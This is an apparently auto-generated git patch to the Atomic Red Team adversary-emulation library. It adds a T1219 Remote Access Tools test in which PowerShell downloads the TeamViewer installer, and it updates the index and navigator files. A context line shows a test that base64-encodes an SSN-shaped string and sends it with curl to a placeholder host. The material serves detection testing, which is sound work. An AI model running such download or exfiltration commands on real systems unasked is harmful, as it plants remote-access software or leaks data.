From fbc458a342e2e7d9d47ee9dec78487378b7bf192 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 27 Feb 2020 18:04:44 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1219/T1219.md | 34 ++++++++
 atomics/art_navigator_layer.json | 2 +-
 atomics/index.md | 3 +-
 atomics/index.yaml | 141 +++++++++++++++++++++++--------
 atomics/linux-index.md | 2 +-
 atomics/linux-matrix.md | 2 +-
 atomics/macos-index.md | 2 +-
 atomics/macos-matrix.md | 2 +-
 atomics/matrix.md | 2 +-
 atomics/windows-index.md | 3 +-
 atomics/windows-matrix.md | 2 +-
 11 files changed, 149 insertions(+), 46 deletions(-)
 create mode 100644 atomics/T1219/T1219.md
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
new file mode 100644
index 00000000..468bb440
--- /dev/null
+++ b/atomics/T1219/T1219.md
@@ -0,0 +1,34 @@
+# T1219 - Remote Access Tools
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
+
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
+
+Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)
+
+## Atomic Tests
+
+- [Atomic Test #1 - TeamViewer Files Detected Test on Windows](#atomic-test-1---teamviewer-files-detected-test-on-windows)
+
+
+
+
+## Atomic Test #1 - TeamViewer Files Detected Test on Windows
+An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine.
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `powershell`!
+```
+$client = new-object System.Net.WebClient
+$client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe")
+```
+
+
+
+
+
+
+
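Review bot: The `$client.DownloadFile(...)` line writes to `C:\tmp\teamviewer.exe` but nothing in the test creates `C:\tmp`, so the download fails on a host where that directory does not exist, and the generated section has no cleanup step, so a successful run leaves the installer on disk. This file is generator output (per the commit subject), so the fix belongs in the technique's source YAML, which is outside this diff; prepend `New-Item -ItemType Directory -Force -Path C:\tmp | Out-Null` to the command and add a `cleanup_command` of `Remove-Item C:\tmp\teamviewer.exe -ErrorAction SilentlyContinue`, so that the regenerated T1219.md and the same test in the index.yaml hunk at `@@ -27104,6 +27102,75 @@` both carry them. The title says "Files Detected" but the section never tells the reader what to detect; a one-line note such as `Detection: look for the file written to C:\tmp\teamviewer.exe and the PowerShell process that performed the download` would make the test usable for validating a detection rule.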
diff --git a/atomics/art_navigator_layer.json b/atomics/art_navigator_layer.json
index a29e55bd..311736cf 100644
--- a/atomics/art_navigator_layer.json
+++ b/atomics/art_navigator_layer.json
@@ -1 +1 @@ -{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T10
55","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score"
:100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabl
ed":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1215","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1501","score":100,"enabled":true},{
"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file +{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"
techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID
":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","
score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1215","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,
"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1501","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/index.md b/atomics/index.md index 7eba821a..8cf4622c 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -953,7 +953,8 @@ - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1219 Remote Access Tools](./T1219/T1219.md) + - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - [T1105 Remote File Copy](./T1105/T1105.md) - Atomic Test #1: rsync remote file copy (push) [linux, macos] - Atomic Test #2: rsync remote file copy (pull) [linux, macos] diff --git a/atomics/index.yaml b/atomics/index.yaml index ed5b577c..b39f6aee 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -26860,59 +26860,57 @@ command-and-control: '': technique: x_mitre_data_sources: - - Network intrusion detection system - - Network protocol analysis - - Process use of network - - Process monitoring + - Packet capture + - Netflow/Enclave netflow x_mitre_permissions_required: - User - name: Remote Access Tools - description: |- - An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - - Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. - - Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) - id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7 - x_mitre_contributors: - - Matt Kelly, @breakersall + name: Port Knocking + description: "Port Knocking is a well-established method used by both defenders + and adversaries to hide open ports from access. To enable a port, an adversary + sends a series of packets with certain characteristics before the port will + be opened. 
Usually this series of packets consists of attempted connections + to a predefined sequence of closed ports, but can involve unusual flags, specific + strings or other unique characteristics. After the sequence is completed, + opening a port is often accomplished by the host based firewall, but could + also be implemented by custom software. \n\nThis technique has been observed + to both for the dynamic opening of a listening port as well as the initiating + of a connection to a listening server on a different system.\n\nThe observation + of the signal packets to trigger the communication can be conducted through + different methods. One means, originally implemented by Cd00r (Citation: Hartrell + cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. + Another method leverages raw sockets, which enables the malware to use ports + that are already open for use by other programs." + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + modified: '2019-07-18T17:11:15.521Z' x_mitre_platforms: - Linux - - Windows - macOS object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_version: '1.0' + x_mitre_version: '1.1' type: attack-pattern - x_mitre_detection: |- - Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators. - - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. - - [Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. 
Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions. + x_mitre_detection: Record network packets sent to and from the system, looking + for extraneous packets that do not belong to established flows. created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_network_requirements: true created: '2018-04-18T17:59:24.739Z' kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control external_references: - - external_id: T1219 + - external_id: T1205 source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1219 - - source_name: Symantec Living off the Land - description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless - attack techniques. Retrieved April 10, 2018. - url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf - - source_name: CrowdStrike 2015 Global Threat Report - description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report. - Retrieved April 11, 2018. - url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf - - source_name: CrySyS Blog TeamSpy - description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ - tolko s razreshenija S-a. Retrieved April 11, 2018. - url: https://blog.crysys.hu/2013/03/teamspy/ - modified: '2019-07-18T17:42:08.766Z' + url: https://attack.mitre.org/techniques/T1205 + - source_name: Hartrell cd00r 2002 + description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible + backdoor. Retrieved October 13, 2018.' 
+ url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 + x_mitre_defense_bypassed: + - Defensive network service scanning atomic_tests: [] T1090: technique: 
@@ -27104,6 +27102,75 @@ command-and-control: command: | echo -n 111-11-1111 | base64 curl -XPOST #{base64_data}.#{destination_url} + T1219: + technique: + x_mitre_data_sources: + - Network intrusion detection system + - Network protocol analysis + - Process use of network + - Process monitoring + x_mitre_permissions_required: + - User + name: Remote Access Tools + description: |- + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + + Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. + + Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) + id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7 + x_mitre_contributors: + - Matt Kelly, @breakersall + x_mitre_platforms: + - Linux + - Windows + - macOS + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_version: '1.0' + type: attack-pattern + x_mitre_detection: |- + Monitor for applications and processes related to remote admin tools. 
Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators. + + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. + + [Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions. + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + x_mitre_network_requirements: true + created: '2018-04-18T17:59:24.739Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + external_references: + - external_id: T1219 + source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1219 + - source_name: Symantec Living off the Land + description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless + attack techniques. Retrieved April 10, 2018. + url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf + - source_name: CrowdStrike 2015 Global Threat Report + description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report. + Retrieved April 11, 2018. + url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf + - source_name: CrySyS Blog TeamSpy + description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ + tolko s razreshenija S-a. Retrieved April 11, 2018. 
+ url: https://blog.crysys.hu/2013/03/teamspy/ + modified: '2019-07-18T17:42:08.766Z' + identifier: T1219 + atomic_tests: + - name: TeamViewer Files Detected Test on Windows + description: "An adversary may attempt to trick the user into downloading teamviewer + and using this to maintain access to the machine. \n" + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $client = new-object System.Net.WebClient + $client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe") T1105: technique: x_mitre_data_sources: diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 4a5c9349..b44b2e0f 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -298,7 +298,7 @@ - T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1219 Remote Access Tools](./T1219/T1219.md) - [T1105 Remote File Copy](./T1105/T1105.md) - Atomic Test #1: rsync remote file copy (push) [linux, macos] - Atomic Test #2: rsync remote file copy (pull) [linux, macos] diff --git a/atomics/linux-matrix.md b/atomics/linux-matrix.md index 08cbe1e9..ed2e8339 100644 --- a/atomics/linux-matrix.md +++ b/atomics/linux-matrix.md 
@@ -16,7 +16,7 @@ | | | [Server Software Component](./T1505/T1505.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](./T1518/T1518.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Setuid and Setgid](./T1166/T1166.md) | | [Indicator Removal on Host](./T1070/T1070.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Systemd Service](./T1501/T1501.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Trap](./T1154/T1154.md) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | 